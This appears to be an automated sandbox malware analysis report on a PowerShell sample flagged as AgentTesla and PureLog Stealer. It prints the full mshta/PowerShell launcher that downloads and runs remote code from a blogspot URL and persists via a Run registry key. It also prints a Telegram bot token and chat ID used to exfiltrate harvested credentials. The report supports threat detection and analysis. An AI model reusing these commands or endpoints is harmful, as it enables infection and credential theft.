Edit tour

Windows Analysis Report
o3KyzpE7F4.ps1

Overview

General Information

Sample name:	o3KyzpE7F4.ps1 renamed because original name is a hash value
Original sample name:	286e6941de5c1fdf6b1dfc6726c0c6f0.ps1
Analysis ID:	1431777
MD5:	286e6941de5c1fdf6b1dfc6726c0c6f0
SHA1:	676a6423aada40788cb9cd90ae05326d5954c390
SHA256:	9545ddef182171d1fd3a8e74fb6ba72614b7ca243aa70c7425157f5d0ec9963e
Tags:	ps1
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected PureLog Stealer

Yara detected Telegram RAT

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Deletes itself after installation

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Powershell In Registry Run Keys

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 5012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 4956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 6096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 6784 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

RegSvcs.exe (PID: 3408 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

MSBuild.exe (PID: 1100 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 4092 cmdline: dw20.exe -x -s 792 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 5836 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 1716 cmdline: dw20.exe -x -s 788 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

mshta.exe (PID: 5392 cmdline: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

mshta.exe (PID: 7612 cmdline: "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

mshta.exe (PID: 7820 cmdline: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 8120 cmdline: "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage?chat_id=6444969864"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6096	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6096	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 6096	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5392, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, ProcessId: 7196, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5392, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, ProcessId: 7196, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", ProcessId: 5012, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3],ql[0],ql[1],ql[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DRAKEXnew2

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3],ql[0],ql[1],ql[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DRAKEXnew2

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", ProcessId: 5012, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7560, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	04/25/24-19:01:27.040324
SID:	2851779
Source Port:	49720
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Found malware configuration

Source: RegSvcs.exe.6096.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage"}
Source: RegSvcs.exe.6096.5.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage?chat_id=6444969864"}

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49739 version: TLS 1.2

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49720 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6566aab26a81Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6578c6979a5eHost: api.telegram.orgContent-Length: 914Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: minecap4-22-24.blogspot.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6566aab26a81Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive

Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/
Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blogspot.l.googleusercontent.com
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000017.00000002.2629762784.0000028E45324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000017.00000002.2534722701.0000028E2B315000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000017.00000002.2530488190.0000028E2B0F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: svchost.exe, 00000012.00000002.3247677107.00000235C680D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
